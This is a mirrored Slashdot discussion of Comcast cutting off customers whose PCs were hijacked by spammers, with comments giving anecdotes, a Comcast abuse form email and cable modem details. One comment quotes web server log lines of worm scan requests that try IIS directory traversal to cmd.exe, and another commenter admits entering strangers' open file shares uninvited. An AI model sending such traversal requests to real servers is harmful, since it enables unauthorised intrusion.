Slashdot Mirror


Comcast Cuts Infected PCs' Network Connections

fidget42 writes "I just noticed this article over at Infoworld. It seems that Comcast is finally doing something about the machines on their network that are being used by spammers. They are now cutting off service to those customers who have computers that have been hijacked by spammers. Now, if only other broadband ISPs would start policing their user base ..."

8 of 592 comments (clear)

  1. Cox does this... by h0mer · · Score: 5, Informative

    I know anecdotal evidence is pretty much worthless, but my friend got infected with all sorts of nasty ad/malwares, along with Blaster and a couple other worms. Cox deactivated his cable modem, he had to call them and go through phone hell to get his service back. So I'm not really sure it's only Comcast doing this.

    --


    I'm on top of my game like I'm standin' on Xbox.
  2. Re:Other ISPs start to do this? by mikeophile · · Score: 5, Informative

    Take a look at this site and you will be able to imagine it quite easily.

  3. Re:Nice but... by caino59 · · Score: 4, Informative
    this is for the people's machines that are constantly trying to hit other machines and infect them....

    you know, where you see stuff like this recurring in your web server's logs...offending ip removed...

    .client.comcast.net - - [09/Mar/2004:14:43:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 332

    .client.comcast.net - - [09/Mar/2004:14:43:56 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 332

    .client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 346

    .client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 346

    .client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356

    .client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 302 376

    .client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 302 376

    .client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1941

    .client.comcast.net - - [09/Mar/2004:14:43:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

    .client.comcast.net - - [09/Mar/2004:14:43:59 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1941

    .client.comcast.net - - [09/Mar/2004:14:44:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

    .client.comcast.net - - [09/Mar/2004:14:44:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

    .client.comcast.net - - [09/Mar/2004:14:44:01 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 337

    .client.comcast.net - - [09/Mar/2004:14:44:01 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 337

    .client.comcast.net - - [09/Mar/2004:14:44:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+d ir HTTP/1.0" 302 356

    .client.comcast.net - - [09/Mar/2004:14:44:02 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356

    the people they are cutting off are sending out daily attacks to multiple machines, not just once or twice sending out crap here and there. i think you'll be ok.

  4. Re:Other ISPs start to do this? by drinkypoo · · Score: 5, Informative
    Unless you have supplied the cable modem, this only works when your cable provider is stupid. I worked for Cisco (interesting that their name crops up so many times on that page) and I happen to know that as they shipped the software to their licensees (among them sony and samsung) it looks for a configuration file only on the cable interface, and never on the ethernet, so in order to hijack the modem you would need your own cable head end (cisco calls them a uBR) and an up-converter, and you would have to hook it up to that head end at least every time you started it up.

    Now, most cable modems have solder pads for a diagnostic connector, which is usually a 3 wire RS-232 serial connection. Sometimes it uses an unusual voltage, and you need a little box to change the levels. If you got access to the diagnostic connector, and your modem had the proper flash image in it, then you could program it through the diagnostic interface.

    I can imagine that some modems you purchase from Fry's or what have you will look for config on ethernet, though I doubt many of them do.

    For more insight on why this typically won't work, the default route on the device typically points to the cable interface, or does not exist if the cable interface is not hot, and the device has two modes of operation with regard to IP addresses on the internal interface; either it sets itself to 192.168.100.1, or it sets itself to whatever the config file tells it, and it starts proxying DHCP requests. Either way it is not going to be able to find your bogus TFTP server on the network unless it is badly misconfigured to begin with.

    --
    "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
  5. My experience with this by MobyDisk · · Score: 4, Informative

    The problem here is that Comcast is doing shutting down people's connections with no recourse to find out why or to re-enable it.

    I received an email and an automated phone call from Comcast stating that I had an infected computer and I must clean it up. I was immediately pleased that they noticed, but frustrated that I could be infected. 5 PCs with varying OSs, all with firewalls and/or antivirus software, so I thought it was unlikely but possible. After doing a full scan I found no viruses.

    So I called Comcast's 800 number. They said I need to call a different long-distance number. That number is an automated system with nothing but dead ends. If I select the option about "Viruses and spam emails" then it tells me to email abuse at comcast.net if I get a bad email. But I don't want to report a spam, I received a report. All the options did approximately the same thing: Told me something I already know then hung up. Several calls later, I used the "leave a message" option. A week goes by and I received no call back. I replied to the email but received no response. Nobody on the service number would talk to me about it.

    So I receive another email telling me that my service may be disabled if I don't fix the problem. So what do I do now?

    To top it off, this isn't the first time. About 8 months ago, Comcast calle and told me I was reported for sending spam. When the read me part of the SpamCop report (which they refused to do many times) it turned out to be a SpamCop report that my roommate made! We _reported_ the spam, we didn't _send_ it! After much arguing, the guy finally got it and left us alone. Mistakes happen, but what irks me the most is that they wanted to tell me I sent a spam, and make sure I corrected my behavior, but refused to tell me the source of the report, or what the email was, or when it was sent, or anything!

    Below is the email Comcast sent me. It looks like a form email, with no specific statement about what went wrong.

    ***PLEASE READ FULLY***

    Comcast has received complaints about your computer. We believe it may be:

    * Infected with a virus

    * Sending "spam" email that you are unaware of

    * Allowing spammers to use your connection to send their spam

    * Trying to infect other computers on the Internet with viruses

    The health of your computer is your responsibility. Consult your computer's manufacturer if you are unable to remedy the situation.

    ***************
    EXPLANATION
    ***************

    This message was sent by the Comcast Network Abuse and Policy Observance Team. We investigate reports of Internet Abuse by our customers. We have received such a report identifying your computer.

    The complaint(s) we have received were from other users of the Internet, who are receiving email from you, which they did not request. We understand that you may not be aware of any such email, and you will not see it in your normal email program.

    Typically these types of emails are caused, or are allowed to be sent by, viruses. They are either trying to infect other user's computers, or they allow spammers to connect to YOUR computer to send their spam.

    If you have anti-virus software on your computer, we recommend visiting the manufacturer's website to update it, as it may be out of date and unable to find the virus that's causing the problem. New viruses come out frequently, so it is important to update the software often, or automatically if possible. We also recommend a security software solution, such as a firewall to further restrict access to your system. Firewalls help to prevent such activity by allowing only the software and transactions that you choose to utilize your Internet connection.

    If you are deliberately sending these emails, we ask you to stop. Further complaints will require us to suspend or even terminate your service.

    If you have further questions or would like to notif

  6. I work for Comcast by ironicsky · · Score: 4, Informative
    I agree with our cut-off policy for people infected with worms. Right now, we're not actually terminating their service, we're just blocking their SMTP and POP access so they cannot transmit viruses. In the rare case, our system will disable a customers account if they are transmitting a virus.

    But, users are dumb, and I'll agree with that. Last summer when the blaster worm came out, we emailed out customers ahead of time telling them they need to download the microsoft patch.

    On top of that, the Microsoft Windows Update popup that comes up by default, once a week, users still continue to ignore it because they don't know what it does.

    Personally, I'd like to see more type of this internet policing by ISP's. They should also be blocking people who have open SMB shares on their Windows Networks. I cant count the number of times I've purposely went in Someones SMB share and dropped a text file telling them how to fix it.

    I, however, disagree with the Government policing of the internet. I believe the internet should be policed by the people who pay for it to be there. That would be us and the ISP's

  7. Re:Yes Yes! by GreyPoopon · · Score: 4, Informative
    While it is good that Comcast is doing something about the problem, this is a bad solution to the problem.

    We as the People-Who-Know need to be spending time helping those who don't to become self-reliant, rather than telling them 'Sorry. You can't access the net until you clean up your system. Sorry, I can't really help you do it. Call someone else.'

    Comcast is already doing this. From the article:

    "Comcast says that it is aware of the problem, is alerting customers who were hacked and helping them secure their computers."
    So, they block their access to trigger the support call, and then help them secure their machine. I think this is the right approach.
    --

    GreyPoopon
    --
    Why is it I can write insightful comments but can't come up with a clever signature?

  8. Blues Brothers by lonesome+phreak · · Score: 4, Informative

    It's a reference to the Blues Brothers, one of the greatest movies ever made. If you haven't seen it then you just don't understand the blues.

    Jake: "Hey what's goin' on?"
    Cop: "Oh those bums won their court case so they're marching today"
    Jake: "What bums?"
    Cop: "The fucking Nazi party!"
    Jake: "Illinois Nazis"
    Elwood: "I hate Illinois Nazis!"

    --
    Maybe we DID take the blue pill. You wouldn't remember anyway.